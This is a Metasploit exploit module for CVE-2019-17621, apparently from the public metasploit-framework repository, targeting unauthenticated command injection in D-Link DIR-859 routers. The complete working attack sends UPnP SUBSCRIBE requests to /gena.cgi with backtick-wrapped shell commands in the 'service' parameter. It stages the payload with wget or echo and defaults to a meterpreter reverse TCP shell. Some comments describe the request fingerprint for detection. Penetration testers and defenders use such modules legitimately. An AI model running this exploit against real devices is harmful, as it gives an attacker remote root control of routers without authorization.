GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Module metadata: affected product, advisory references, payload defaults
  # and the CmdStager flavours available for delivering the payload.
  def initialize(info = {})
    details = {
      'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
      'Description' => %q{
        D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
        /htdocs/cgibin), which is accessible without credentials.
      },
      'Author' => [
        'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
        'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
      ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2019-17621' ],
        [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
      ],
      'DisclosureDate' => '2019-12-24',
      'Privileged' => true,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
        'CMDSTAGER::FLAVOR' => 'wget',
        'RPORT' => '49152' # UPnP HTTP listener on the affected device
      },
      'Targets' => [
        [ 'Automatic', {} ],
      ],
      'CmdStagerFlavor' => %w[echo wget],
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [ARTIFACTS_ON_DISK],
        'Reliability' => [REPEATABLE_SESSION]
      }
    }

    super(update_info(info, details))
  end

  # Issues a single UPnP SUBSCRIBE request to /gena.cgi with +cmd+ embedded,
  # backtick-wrapped, in the +service+ query parameter. The CmdStager calls
  # this once per command line; +_opts+ is accepted only to match that
  # callback signature and is not used.
  #
  # On the wire this is the exploit's observable fingerprint: method SUBSCRIBE,
  # path /gena.cgi, and a +service+ value containing backticks, which legitimate
  # GENA subscribers do not produce.
  #
  # @param cmd  [String] the shell command line to inject
  # @param _opts [Hash] ignored
  # @raise via fail_with(Failure::Unreachable) when the TCP connection fails
  def execute_command(cmd, _opts)
    # Random octet (0-255), port (0-65535) and path segment for the Callback header.
    octet = Rex::Text.rand_text_hex(2).to_i(16)
    port = Rex::Text.rand_text_hex(4).to_i(16)
    segment = Rex::Text.rand_text_alpha(3..12)
    # The Callback value is a randomised private-range URL; it is only there so
    # the SUBSCRIBE request is well-formed — NOTE(review): confirm, the payload
    # itself arrives via the CmdStager flavour rather than this address.
    callback = "http://192.168.0.#{octet}:#{port}/#{segment}"

    send_request_raw(
      'uri' => "/gena.cgi?service=`#{cmd}`",
      'method' => 'SUBSCRIBE',
      'headers' => {
        'Callback' => "<#{callback}>",
        'NT' => 'upnp:event',
        'Timeout' => 'Second-1800'
      }
    )
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
  end

  # Entry point: delegates to the CmdStager, which splits the payload into
  # command lines of at most 500 characters and feeds each to execute_command.
  def exploit
    execute_cmdstager(linemax: 500)
  end
end